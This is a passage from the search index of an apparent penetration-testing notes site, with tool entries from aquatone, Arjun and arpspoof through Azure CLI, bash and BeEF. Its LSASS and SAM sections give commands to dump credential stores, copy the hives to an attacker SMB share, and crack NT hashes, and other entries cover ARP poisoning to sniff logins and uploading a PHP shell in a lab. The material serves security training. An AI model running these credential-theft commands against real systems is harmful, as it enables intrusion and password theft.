                        sudo apt install golang chromium-driver\n\ngo get github.com/michenriksen/aquatone\n\nexport PATH=\"$PATH\":\"$HOME/go/bin\"\n
                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"aquatone/#basic-usage","title":"Basic usage","text":"
                        cat example_of_list.txt | aquatone -out ./aquatone -screenshot-timeout 1000\n
                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"arjun/","title":"Arjun","text":"","tags":["api","tools"]},{"location":"arjun/#installation","title":"Installation","text":"
                        sudo git clone\u00a0https://github.com/s0md3v/Arjun.git\n

                        Other ways:

                        pip3 install arjun\n
                        ","tags":["api","tools"]},{"location":"arjun/#basic-commands","title":"Basic commands","text":"
                        # Run arjun againts a single URL\narjun -u https://api.example.com/endpoint\n\n# arjun will provide you with likely parameters from a wordlist. Its results are based on the deviation of response lengths/codes\narjun --headers \"Content-Type: application/json\" -u http://api.example.com/register -m JSON --include='{$arjun}' --stable\n# -m Get method parameters GET/POST/JDON/XML\n# -i Import targets (a txt list)\n# --include Specify injection point, for example:\n        #  --include='<?xml><root>$arjun$</root>\n        #  --include='{\"root\":{\"a\":\"b\",$arjun$}}'\n

                        Awesome wiki about arjun usage: https://github.com/s0md3v/Arjun/wiki/Usage.

                        ","tags":["api","tools"]},{"location":"arp-poisoning/","title":"Arp poisoning","text":"

                        This attack is performed by sending gratuitous ARP replies.

                        ","tags":["windows","linux","arp","arp poisoning"]},{"location":"arp-poisoning/#intercepting-smb-traffic","title":"Intercepting SMB traffic","text":"

                        We'll be using arpspoof tool, included in dniff.

                        ","tags":["windows","linux","arp","arp poisoning"]},{"location":"arpspoof-dniff/","title":"arpspoof from dniff","text":"

                        dniff is a collection of tools for network auditing and penetration testing. It includes arpspoof, a utility designed to intercept traffic on a switched LAN.

                        Before running, enable Linux Kernel IP Forwarding (this transforms Linux box into a router).

                        echo 1 > /proc/sys/net/ipv4/ip_forward\n

                        And then, run arpspoof:

                        arpspoof -i <interface> -t $ip -r <host IP>\n# interface: NIC you want to use (like eth0 for your local LAN, or tap0 for Hera Lab)\n# target IP: one of the victim address\n# host IP: the other victim address.\n

                        After that, run Wireshark to intercept the traffic.

                        • SMB traffic. When capturing smb traffic in wireshark, go to: FILE>Export Objects>SMB/SMB2. There you have all files uploaded or downloaded from a server during a SMB capture session.
                        • Telnet traffic: Telnet sends characters one by one, that's why you don't see the username/password straight away. But with \"Follow TCP Stream\", wireshark will put all data together and you will be able to see the username/password. Just rightclick on a packet of the telnet session and choose: \"Follow TCP Stream\".
                        ","tags":["windows","tools"]},{"location":"attacking-lsass/","title":"Attacking LSASS","text":"

                        See Windows credentials storage.

                        "},{"location":"attacking-lsass/#dumping-lsass-process-memory","title":"Dumping LSASS Process Memory","text":"

                        There are several methods to dump LSASS process memory.

                        "},{"location":"attacking-lsass/#1-task-manager-method","title":"1. Task manager method","text":"

                        Open it. In Process tab, search for Local Security Authority Process. Click right on it and select Create dump file. A file called lsass.DMP is created and saved in:

                        C:\\Users\\loggedonusersdirectory\\AppData\\Local\\Temp\n

                        Transfer file to attacking machine.

                        "},{"location":"attacking-lsass/#rundll32exe-comsvcsdll-method","title":"Rundll32.exe & Comsvcs.dll method","text":"

                        Modern anti-virus tools recognize this method as malicious activity.

                        # Finding LSASS PID in cmd\ntasklist /svc\n\n# Finding LSASS PID in PowerShell\nGet-Process lsass\n\n# Creating lsass.dmp using PowerShell\nrundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump <PID> C:\\lsass.dmp full\n# With this command, we are running rundll32.exe to call an exported function of comsvcs.dll which also calls the MiniDumpWriteDump (MiniDump) function to dump the LSASS process memory to a specified directory (C:\\lsass.dmp). \n

                        Transfer file to attacking machine.

                        "},{"location":"attacking-lsass/#3-pypykatz","title":"3. Pypykatz","text":"

                        pypykatz parses the secrets hidden in the LSASS process memory dump.

                        pypykatz lsa minidump /home/path/lsass.dmp \n
                        "},{"location":"attacking-lsass/#crack-the-file","title":"Crack the file","text":""},{"location":"attacking-lsass/#cracking-the-nt-hash-with-hashcat","title":"Cracking the NT Hash with Hashcat","text":"
                        sudo hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt\n
                        "},{"location":"attacking-sam/","title":"Attacking SAM","text":"

                        See Windows credentials storage.

                        "},{"location":"attacking-sam/#dumping-sam-locally","title":"Dumping SAM Locally","text":""},{"location":"attacking-sam/#1-copying-sam-registry-hives","title":"1. Copying SAM Registry Hives","text":"

                        There are three registry hives that we can copy if we have local admin access on the target; each will have a specific purpose when we get to dumping and cracking the hashes.

                        Registry Hive Description hklm\\sam Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext. hklm\\system Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database. hklm\\security Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.

                        Launching CMD as an admin will allow us to run reg.exe to save copies of the registry hives.

                        reg.exe save hklm\\sam C:\\sam.sav\n\nreg.exe save hklm\\system C:\\system.save\n\nreg.exe save hklm\\security C:\\security.save\n

                        Transfer the registry hives to our attacker machine, for instance, with smbserver.py from impacket.

                        # From the attacker machine (our kali) all we must do to create the share is run smbserver.py -smb2support using python, give the share a name (CompData) and specify the direct\n#########################################\nsudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/\n\n# From the victim's machine (windows)\n#########################################\nmove sam.save \\\\$ipAttacker\\CompData\nmove system.save \\\\$ipAttacker\\CompData\nmove security.save \\\\$ipAttacker\\CompData\n
                        "},{"location":"attacking-sam/#2-dumping-hashes-with-impackets-secretsdumppy","title":"2. Dumping Hashes with Impacket's secretsdump.py","text":"
                        locate secretsdump \n
                        python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL\n

                        Secretsdump dumps the local SAM hashes and would've also dumped the cached domain logon information if the target was domain-joined and had cached credentials present in hklm\\security.

                        The first step secretsdump executes is targeting the system bootkey before proceeding to dump the LOCAL SAM hashes. It cannot dump those hashes without the boot key because that boot key is used to encrypt & decrypt the SAM database.

                        Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n(uid:rid:lmhash:nthash)\n

                        Most modern Windows operating systems store the password as an NT hash. Operating systems older than Windows Vista & Windows Server 2008 store passwords as an LM hash, so we may only benefit from cracking those if our target is an older Windows OS. Knowing this, we can copy the NT hashes associated with each user account into a text file and start cracking passwords.

                        "},{"location":"attacking-sam/#3-cracking-hashes-with-hashcat","title":"3. Cracking Hashes with Hashcat","text":"

                        See hashcat:

                        # Adding nthashes to a .txt File\n# Copy paste them in hashestocrack.txt\n\n# Hashcat them\nsudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt\n# -m 1000: select module for NT hashes\n
                        "},{"location":"attacking-sam/#dumping-sam-remotely","title":"Dumping SAM Remotely","text":""},{"location":"attacking-sam/#with-crackmapexec","title":"With CrackMapExec","text":"

                        With access to credentials with local admin privileges, it is also possible for us to target LSA Secrets over the network.

                        Cheat sheet of CrackMapExec.

                        crackmapexec smb $ip --local-auth -u <username> -p <password> --sam\n\ncrackmapexec smb $ip --local-auth -u <username> -p <password> --lsa\n
                        "},{"location":"aws-cli/","title":"AWS cli","text":"

                        Tool to list S3 objects. S3 is an object storage service in the AWS cloud service. With S3, you can store objects in buckets. Files stored in an Amazon S3 bucket are called S3 objects.

                        ","tags":["cloud","amazon","s3","aws"]},{"location":"aws-cli/#installation","title":"Installation","text":"
                        curl \"https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip\" -o \"awscliv2.zip\"\nunzip awscliv2.zip\nsudo ./aws/install\n

                        Update version:

                        sudo ./aws/install --bin-dir /usr/local/bin --install-dir /usr/local/aws-cli --update\n

                        To access you will need access key. You generate access keys in AWS Dashboard.

                        aws configure  \nAWS Access Key ID [None]: a  \nAWS Secret Access Key [None]: a  \nDefault region name [None]: <region>  \nDefault output format [None]: text\n\n#######################\n###### Where\n#######################\n# - _AWS Access Key ID_ & _AWS Secret Access Key can be any random strings at least one character long,_\n# - _Default region name_ can be any region from [AWS\u2019s region list](https://aws.amazon.com/about-aws/global-infrastructure/regions_az/),\n# - _Default output format_ can be `json`, `yaml`, `yaml-stream`, `table` or `text`. As we are not expecting enormous amount of data, `text` should do just fine.\n
                        ","tags":["cloud","amazon","s3","aws"]},{"location":"aws-cli/#basic-commands","title":"Basic commands","text":"
                        # Check version\naws --version\n\n# List IAM users (if you have permissions)\naws iam list-users --region <region>\n# --region is optional\n

                        Uploaded the file shell.php to the S3 bucket thetoppers.htb.

                        aws --endpoint=http://s3.thetoppers.htb s3 cp simpleshell.php s3://thetoppers.htb\n
                        aws [service-name] [command] [args] [--flag1] [--flag2]\n
                        ","tags":["cloud","amazon","s3","aws"]},{"location":"azure-cli/","title":"Azure-CLI","text":"

                        The Azure CLI is a command-line interface. A cross-platform command-line program (Windows, Linux and macOs) to connect to Azure and execute administrative commands.

                        All commands: https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest.

                        It\u2019s an executable program that you can use to execute commands in Bash. You can use the Azure CLI to perform every possible management task in Azure. Like Azure PowerShell, the CLI allows you to run one-off commands or you can combine them into a script and execute them together.

                        Azure CLI is a command-line program to connect to Azure and execute administrative commands on Azure resources. It runs on Linux, macOS, and Windows, and allows administrators and developers to execute their commands through a terminal, command-line prompt, or script instead of a web browser.

                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#installation","title":"Installation","text":"
                        • Linux: apt-get on Ubuntu, yum on Red Hat, and zypper on OpenSUSE
                        • Mac: Homebrew.

                        • Modify your sources list so that the Microsoft repository is registered and the package manager can locate the Azure CLI package:

                        AZ_REPO=$(lsb_release -cs)\necho \"deb [arch=amd64] https://packages.microsoft.com/repos/azure-cli/ $AZ_REPO main\" | \\\nsudo tee /etc/apt/sources.list.d/azure-cli.list\n
                        1. Import the encryption key for the Microsoft Ubuntu repository. This allows the package manager to verify that the Azure CLI package you install comes from Microsoft.
                        curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -\n
                        1. Install the Azure CLI:
                        sudo apt-get install apt-transport-https\nsudo apt-get update\nsudo apt-get install azure-cli\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#basic-usage","title":"Basic usage","text":"

                        Run Azure-CLI

                        # Running Azure-CLI from Cloud Shell\nbash\n\n# Running Azure-CLI from Linux\naz\n

                        Basic commands to warm up:

                        # See installed version\naz --version\n\n# you can use the letters az to start an Azure command \naz upgrade\n\n# Launch Azure CLI interactive mode\naz interactive\n\n# Getting help. If you want to find commands that might help you manage a storage blob, you can use the find command:\naz find blob\n\n# If you already know the name of the command you want, the\u00a0`--help`\u00a0argument\naz storage blob --help\n

                        Commands in the CLI are structured in\u00a0groups\u00a0and\u00a0subgroups. Each group represents a service provided by Azure, and the subgroups divide commands for these services into logical groupings. For example, the\u00a0storage\u00a0group contains subgroups including\u00a0account,\u00a0blob, and\u00a0queue.

                        Because you're working with a local install of the Azure CLI, you'll need to authenticate before you can execute Azure commands by using the Azure CLI\u00a0login\u00a0command.

                        az login\n

                        The Azure CLI will typically launch your default browser to open the Azure sign-in page. After successfully signing in, you'll be connected to your Azure subscription.

                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#output-formatting","title":"Output formatting","text":"
                        # Results in a json format by default\naz group list\n\n# Results in a line format\naz group list --out tsv\n\n# Results in a table\naz group list --out table\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#resource-groups","title":"Resource groups","text":"
                        # List resource groups\naz group list\n# remember you can format output\n\n# List all your resource groups in a table:\naz group list --output table\n\n# Return in json all my resources in my resource group:\naz group list --query \"[?name == '$RESOURCE_GROUP']\"\n\n\n# Retrieve properties from an existing and known resource group\naz group show --name myresourcegroup\n\n# From a specific resource group (provided, for instance, its name), query a value. Querying location:\naz group show --name <name> --query location --out table\n\n# Querying id\naz group show --name <name> --query id --out table\n\n# Create a Resource group\naz group create --name <name> --location <location>\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#disk","title":"Disk","text":"
                        # List disks\naz disk list\n\n# Retrieve the properties of an existing Disk\naz disk show --name myDiskname --resource-group rg-test2\n\n# Retrieve the properties of an existing Disk, and output it in a table\naz disk show --name myDiskname --resource-group rg-test2 --out table\n\n\n# Create a new disk\naz disk create --resource-group $myResourceGroup --name $mynewDisk --sku \"Standard_LRD\" --size-gb 32\n\n# Increase the size of a disk\naz disk update --resource-group $myResourceGroup --name $myDiskName --size-gb 64\n\n# Change standard SKU to premium\naz disk update --resource-group $myResourceGroup --name $myDiskName --sku \"Premium_LRS\"\n\n# Verify size of a disk by querying size\naz disk show --resource-group $myResourceGroup --name $myDiskName --query diskSizeGb --out table\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#vms","title":"VMs","text":"
                        # Check running VMs\naz vm list\n\n# List IP addresses \naz vm list-ip-addres ses\n\n# Create a VM with UbuntuLTS\naz vm create --resourcegroup MyResourceGroup --name MyVM01 --image UbuntLTS --generate-ssh-keys\n\n# Create a VM\naz vm create --resource-group learn-857e3399-575d-4759-8de9-0c5a22e035e9 --name my-vm  --public-ip-sku Standard --image Ubuntu2204 --admin-username azureuser  --generate-ssh-keys\n\n# Restart existing VM\naz vm restart -g MyResourceGroup -n MyVm\n\n# Configure Nginx on your VM\naz vm extension set  --resource-group learn-857e3399-575d-4759-8de9-0c5a22e035e9  --vm-name my-vm  --name customScript  --publisher Microsoft.Azure.Extensions  --version 2.1  --settings '{\"fileUris\":[\"https://raw.githubusercontent.com/MicrosoftDocs/mslearn-welcome-to-azure/master/configure-nginx.sh\"]}'  --protected-settings '{\"commandToExecute\": \"./configure-nginx.sh\"}'\n\n# Create a variable with public IP address: Run the following\u00a0`az vm list-ip-addresses`\u00a0command to get your VM's IP address and store the result as a Bash variable:\nIPADDRESS=\"$(az vm list-ip-addresses --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --name my-vm --query \"[].virtualMachine.network.publicIpAddresses[*].ipAddress\" --output tsv)\"\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#nsg-network-security-groups","title":"NSG (Network Security Groups)","text":"
                        # Run the following\u00a0`az network nsg list`\u00a0command to list the network security groups that are associated with your VM:\naz network nsg list --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --query '[].name' --output tsv\n\n# You see this:\n# my-vmNSG \n# Every VM on Azure is associated with at least one network security group. In this case, Azure created an NSG for you called\u00a0_my-vmNSG_.\n# Run the following\u00a0`az network nsg rule list`\u00a0command to list the rules associated with the NSG named\u00a0_my-vmNSG_:\naz network nsg rule list --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --nsg-name my-vmNSG\n\n# Run the\u00a0`az network nsg rule list`\u00a0command a second time. This time, use the\u00a0`--query`\u00a0argument to retrieve only the name, priority, affected ports, and access (**Allow**\u00a0or\u00a0**Deny**) for each rule. The\u00a0`--output`\u00a0argument formats the output as a table so that it's easy to read.\naz network nsg rule list --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --nsg-name my-vmNSG --query '[].{Name:name, Priority:priority, Port:destinationPortRange, Access:access}' --output table\n# You see this:\n# Name              Priority    Port    Access\n# -----------------  ----------  ------  --------\n# default-allow-ssh  1000        22      Allow\n\n# By default, a Linux VM's NSG allows network access only on port 22. This enables administrators to access the system. You need to also allow inbound connections on port 80, which allows access over HTTP.\n# Run the following\u00a0`az network nsg rule create`\u00a0command to create a rule called\u00a0_allow-http_\u00a0that allows inbound access on port 80:\naz network nsg rule create --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --nsg-name my-vmNSG --name allow-http --protocol tcp --priority 100 --destination-port-range 80 --access Allow\n

                        Script:

                        # The script under https://raw.githubusercontent.com/MicrosoftDocs/mslearn-welcome-to-azure/master/configure-nginx.sh\n\n#!/bin/bash\n\n# Update apt cache.\nsudo apt-get update\n\n# Install Nginx.\nsudo apt-get install -y nginx\n\n# Set the home page.\necho \"<html><body><h2>Welcome to Azure! My name is $(hostname).</h2></body></html>\" | sudo tee -a /var/www/html/index.html\n

                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#app-service-plan","title":"App Service plan","text":"

                        Create variables:

                        export RESOURCE_GROUP=learn-fbc52a1a-b4e0-491b-ab1e-a2e3d6eff778 \nexport AZURE_REGION=eastus \nexport AZURE_APP_PLAN=popupappplan-$RANDOM \nexport AZURE_WEB_APP=popupwebapp-$RANDOM\n

                        Create an App Service plan to run your app.

                        az appservice plan create --name $AZURE_APP_PLAN --resource-group $RESOURCE_GROUP --location $AZURE_REGION --sku FREE\n

                        Verify that the service plan was created successfully by listing all your plans in a table:

                        az appservice plan list --output table\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#web-app","title":"Web app","text":"

                        Create variables:

                        export RESOURCE_GROUP=learn-fbc52a1a-b4e0-491b-ab1e-a2e3d6eff778 \nexport AZURE_REGION=eastus \nexport AZURE_APP_PLAN=popupappplan-$RANDOM \nexport AZURE_WEB_APP=popupwebapp-$RANDOM\n

                        Create a Web App

                        # Create web app\naz webapp create --name $AZURE_WEB_APP --resource-group $RESOURCE_GROUP --plan $AZURE_APP_PLAN\n

                        List existing ones:

                        az webapp list --output table\n

                        Return HTTP address of my web app:

                        site=\"http://$AZURE_WEB_APP.azurewebsites.net\"\necho $site\n

                        Getting the default html for the sample web app:

                        curl $AZURE_WEB_APP.azurewebsites.net\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#deploy-code-from-github","title":"Deploy code from Github","text":"

                        Create variables:

                        export RESOURCE_GROUP=learn-fbc52a1a-b4e0-491b-ab1e-a2e3d6eff778 \nexport AZURE_REGION=eastus \nexport AZURE_APP_PLAN=popupappplan-$RANDOM \nexport AZURE_WEB_APP=popupwebapp-$RANDOM\n

                        The goal is to deploy code from a GitHub repository to the web app.

                        az webapp deployment source config --name $AZURE_WEB_APP --resource-group $RESOURCE_GROUP --repo-url \"https://github.com/Azure-Samples/php-docs-hello-world\" --branch master --manual-integration\n

                        Once it's deployed, hit your site again with a browser or CURL:

                        curl $AZURE_WEB_APP.azurewebsites.net\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#deploy-an-arm-template","title":"Deploy an ARM template","text":"

                        Prerequisites:

                        # First, sign in to Azure by using the Azure CLI \naz login\n\n# define your resource group. \n    # 1. You can obtain available location values from: \naz account list-locations\n    # 2. You can configure the default location using \naz configure --defaults location=<location>\n    # 3. If non existentm create it\n    az group create --name {name of your resource group} --location \"{location}\"\n

                        Now, you are set. Deploy your ARM template:

                        templateFile=\"{provide-the-path-to-the-template-file}\"\naz deployment group create --name blanktemplate --resource-group myResourceGroup --template-file $templateFile\n

                        Use linked templates to deploy complex solutions. You can break a template into many templates and deploy these templates through a main template. When you deploy the main template, it triggers the linked template's deployment. You can store and secure the linked template by using a SAS token.

                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#aks","title":"AKS","text":"

                        Azure Container Registry

                        # Authenticate to an Azure Container Registry\naz acr login --name <acrName>\n# This will log me to the acr with the token that was generated when authenticating my session firstly.\n

                        # Get the resource ID of your AKS cluster\nAKS_CLUSTER=$(az aks show --resource-group myResourceGroup --name myAKSCluster --query id -o tsv)\n\n# Get the account credentials for the logged in user\nACCOUNT_UPN=$(az account show --query user.name -o tsv)\nACCOUNT_ID=$(az ad user show --id $ACCOUNT_UPN --query objectId -o tsv)\n\n# Assign the 'Cluster Admin' role to the user\naz role assignment create --assignee $ACCOUNT_ID --scope $AKS_CLUSTER --role \"Azure Kubernetes Service Cluster Admin Role\"\n
                        # You create an application named App1 in an Azure tenant. You need to host the application as a multitenant application for any users in Azure, while restricting non-Azure accounts. You need to allow administrators in other Azure tenants to add the application to their gallery.\naz ad app create \u2013display-name app1--sign-in-audience AzureADMultipleOrgs\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-powershell/","title":"Azure Powershell","text":"

                        See all available releases for powershell: https://github.com/PowerShell/PowerShell/releases.

                        Azure powershell documentation: https://learn.microsoft.com/en-us/powershell/azure/?view=azps-10.3.0

                        Az\u00a0is the formal name for the Azure PowerShell module containing cmdlets to work with Azure features. It contains hundreds of cmdlets that let you control nearly every aspect of every Azure resource. You can work with the following features, and more: Resource groups, Storage, VMs, Azure AD, Containers, Machine learning.

                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#installation","title":"Installation","text":"
                        # Get version of the installed AZ module\nGet-InstalledModule -Name Az -AllVersions | Select-Object -Property Name, Version\n\n# To install a new AZ Module, run as Administrator\nInstall-Module -Name Az -AllowClobber -Repository PSGallery -Force\n\n# To update a new AZ Module, run as Administrator\nUpdate-Module -Name Az -AllowClobber -Repository PSGallery\n

                        You can have several versions of Powershell Azure installed.

                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#linux","title":"Linux","text":"
                        # Import the encryption key for the Microsoft Ubuntu repository. This key enables the package manager to verify that the PowerShell package you install comes from Microsoft.\ncurl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -\n\n# Register the Microsoft Ubuntu repository so the package manager can locate the PowerShell package:\nsudo curl -o /etc/apt/sources.list.d/microsoft.list https://packages.microsoft.com/config/ubuntu/18.04/prod.list\n\n# Update the list of packages:\nsudo apt-get update\n\n# Install PowerShell:\nsudo apt-get install -y powershell\n\n# Start PowerShell to verify that it installed successfully:\npwshx\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#basic-commands","title":"Basic commands","text":"

                        Cmdlets are shipped in modules. A PowerShell Module is a dynamic-link library (DLL) that includes the code to process each available cmdlet. Az is the formal name for the Azure PowerShell module, which contains cmdlets to work with Azure features.

                        # Load module\nGet-Module\n\n# Install Azure module\nInstall-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force\n\n# Update powershell module\nUpdate-Module -Name Az\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#managing-infrastructure","title":"Managing infrastructure","text":"

                        For an account to work, you need a subscription. Additionally, you will need to create several resources: a resource group, an storage account and a file share.

                        # First, connect to your Azure account\nConnect-AzAccount\n\n# List your subscriptions \nGet-AzSubscription\n\n# Set a variable name for your subscription context and set context in Azure\n$context = Get-AzSubscription -SubscriptionId <ID>\n# Set context \nSet-AzContext $context\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#resource-groups","title":"Resource Groups","text":"
                        # List existing Resource Groups\nGet-AzResourceGroup\n\n# Create a new Resource group. Two things needed: a name and a location. Create variables for those:\n$location = (Get-AzResourceGroup -Name resource-group_test1).Location\n$rgName = \"myresourcegroup\"\nNew-AzResourceGroup -Name $rgName -Location $location\n\n# A way to assign a variable to location if you want to replicate an existing location from another resource group \n$location = (Get-AzResourceGroup -Name $rgName).Location\n\n\n# Delete resource groups\nRemove-AzResourceGroup -Name \"ContosoRG01\"\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#vms","title":"VMs","text":"
                        # List VMs\nGet-AzVm\n\n\n# Create a new VM\nNew-AzVm -ResourceGroupName $rgName -Name \"MyVM01\" -Image \"UbuntLTS\"\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#storage-accounts","title":"Storage accounts","text":"
                        # List VMs\nGet-AzStorageAccount\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#file-disk","title":"File Disk","text":"
                        # List all File shares\nGet-AzDisk\n\n# Create a new configuration for your File Disk\n$myDiskConfig = New-AzDiskConfig -Location $location -CreateOption Empty -DiskSizeGB 32 -Sku Standard_LRS\n\n# Create the file disk. First assign a variable for the disk name\n$myDiskName = \"myDiskname\"\nNew-AzDisk -ResourceGroupName $myresourcegroup -DiskName $myDiskName -Disk $myDiskConfig\n\n# Increase size of an existing Az Disk\nNew-AzDiskUpdateConfig -DiskSize 64 | Update-AzDisk -ResourceGroup $rgName -DiskName $myDiskName\n\n# Get current SKU of a given Az Disk\n(Get-AzDisk -ResourceGroupName rg-test2 -Name myDiskName).Sku  \n\n# Update an Standard_LRS SKU to a premium one \nNew-AzDiskUpdateConfig -Sku Premium_LRS | Update-AzDisk -ResourceGroupName $rgName -DiskName $myDiskName\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#webapps","title":"WebApps","text":"
                        # List webapps and provide name and location\nGet-AzWebapp | Select-Object Name, Location\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#_1","title":"Azure Powershell","text":"","tags":["cloud","azure","powershell"]},{"location":"bash/","title":"Bash - Bourne Again Shell","text":"","tags":["bash"]},{"location":"bash/#file-descriptors-and-redirections","title":"File descriptors and redirections","text":"
                        # <<: # This is known as a \"here document\" or \"here-strings\" operator. It allows you to input multiple lines of text into a command or a file. Example:\ncat << EOF > stream.txt\n

                        1. cat: It is a command used to display the contents of a file.

                        2. <<: This is known as a \"here document\" or \"here-strings\" operator. It allows you to input multiple lines of text into a command or a file.

                        3. EOF: It stands for \"End of File\" and serves as a delimiter to mark the end of the input. You can choose any other unique string instead of \"EOF\" as long as it is consistent with the opening and closing delimiter.

                        4. >: This is a redirection operator used to redirect the output of a command to a file. In this case, it will create a new file named stream.txt or overwrite its contents if it already exists.

                        5. stream.txt: It is the name of the file where the input text will be written.

                        ","tags":["bash"]},{"location":"bash/#shortcuts","title":"Shortcuts","text":"

                        +Delete last word CTRL-W +Fill out the next word that appears in gray: CTRL ->

                        ","tags":["bash"]},{"location":"bash/#commands","title":"Commands","text":"","tags":["bash"]},{"location":"bash/#df","title":"df","text":"

                        Displays the amount of space available on the file system containing each file name argument.

                        df -H\n# -H: Print sizes in powers of 1000\n# -h: Print sizes in powers of 1024. Humanly readable.\n
                        ","tags":["bash"]},{"location":"bash/#host","title":"host","text":"

                        host is a simple utility for performing DNS lookups. It is normally used to convert names to IP addresses and vice versa. When no arguments or options are given, host prints a short summary of its command-line arguments and options.

                        # General syntax\nhost <name> <server> \n\n# <name> is the domain name that is to be looked up. It can also be a dotted-decimal IPv4 address or a colon-delimited IPv6 address, in which case host by default performs  a  reverse  lookup  for  that  address.   \n# <server>  is  an optional argument which is either the name or IP address of the name server that host should query instead of the server or servers listed in /etc/resolv.conf.\n

                        Example:

                        host example.com 8.8.8.8\n
                        ","tags":["bash"]},{"location":"bash/#lsblk","title":"lsblk","text":"
                        # Lists block devices.\nlsblk\n
                        ","tags":["bash"]},{"location":"bash/#lsusb","title":"lsusb","text":"
                        # Lists USB devices\nlsusb\n
                        ","tags":["bash"]},{"location":"bash/#lsof","title":"lsof","text":"
                        # Lists opened files.\nlsof\n
                        ","tags":["bash"]},{"location":"bash/#lspci","title":"lspci","text":"
                        # Lists PCI devices.\nlspci\n
                        ","tags":["bash"]},{"location":"bash/#lsb_release","title":"lsb_release","text":"

                        Print distribution-specific information

                        # Display version, id, description, release and codename of the distro\nlsb_release -a \n
                        ","tags":["bash"]},{"location":"bash/#netstat","title":"netstat","text":"

                        Print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships. By default, netstat displays a list of open sockets. If you don't specify any address families, then the active sockets of all configured address families will be printed.

                        netstat -tnlp\n# -p: Show  the  PID  and name of the program to which each socket belongs. \n# -l: Show only listening sockets.\n\n# Show networks accessible via VP\nnetstat -rn\n# -r: Display the kernel routing tables. Replacement for netstat -r is \"ip route\".\n# -n: Show numerical addresses instead of trying to determine symbolic host, port or user names.\n
                        ","tags":["bash"]},{"location":"bash/#sed","title":"sed","text":"

                        sed looks for patterns we have defined in the form of regular expressions (regex) and replaces them with another pattern that we have also defined. Let us stick to the last results and say we want to replace the word \"bin\" with \"HTB.\"

                        The \"s\" flag at the beginning stands for the substitute command. Then we specify the pattern we want to replace. After the slash (/), we enter the pattern we want to use as a replacement in the third position. Finally, we use the \"g\" flag, which stands for replacing all matches.

                        cat /etc/passwd | grep -v \"false\\|nologin\" | tr \":\" \" \" | awk '{print $1, $NF}' | sed 's/bin/HTB/g'\n
                        ","tags":["bash"]},{"location":"bash/#ss","title":"ss","text":"

                        Sockets statistic. It can be used to check which ports are listening locally on a given machine.

                        ss -ltn\n#-l: Display only listening sockets.\n#-t: Display TCP sockets.\n#-n: Do not try to resolve service name.\n

                        How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only):

                        ss -l -4 | grep -v \"127\\.0\\.0\" | grep \"LISTEN\" | wc -l\n#   **-l**: show only listening services\n#   **-4**: show only ipv4\n#   **-grep -v \"127.0.0\"**: exclude all localhost results\n#   **-grep \"LISTEN\"**: better filtering only listening services\n#   **wc -l**: count results\n
                        ","tags":["bash"]},{"location":"bash/#uname","title":"uname","text":"

                        # Print out the kernel release to search for potential kernel exploits quickly.\nuname -r\n\n\n```shell-session\n## Flags\n -a, --all\n              print all information, in the following order, except omit -p and -i if unknown:\n\n       -s, --kernel-name\n              print the kernel name\n\n       -n, --nodename\n              print the network node hostname\n\n       -r, --kernel-release\n              print the kernel release\n\n       -v, --kernel-version\n              print the kernel version\n\n       -m, --machine\n              print the machine hardware name\n\n       -p, --processor\n              print the processor type (non-portable)\n\n       -i, --hardware-platform\n              print the hardware platform (non-portable)\n\n       -o, --operating-system\n
                        ```

                        ","tags":["bash"]},{"location":"beef/","title":"BeEF - The browser exploitation framework project","text":"

                        BeEF\u00a0is short for\u00a0The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

                        ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#installation","title":"Installation","text":"

                        Repository: https://github.com/beefproject/beef

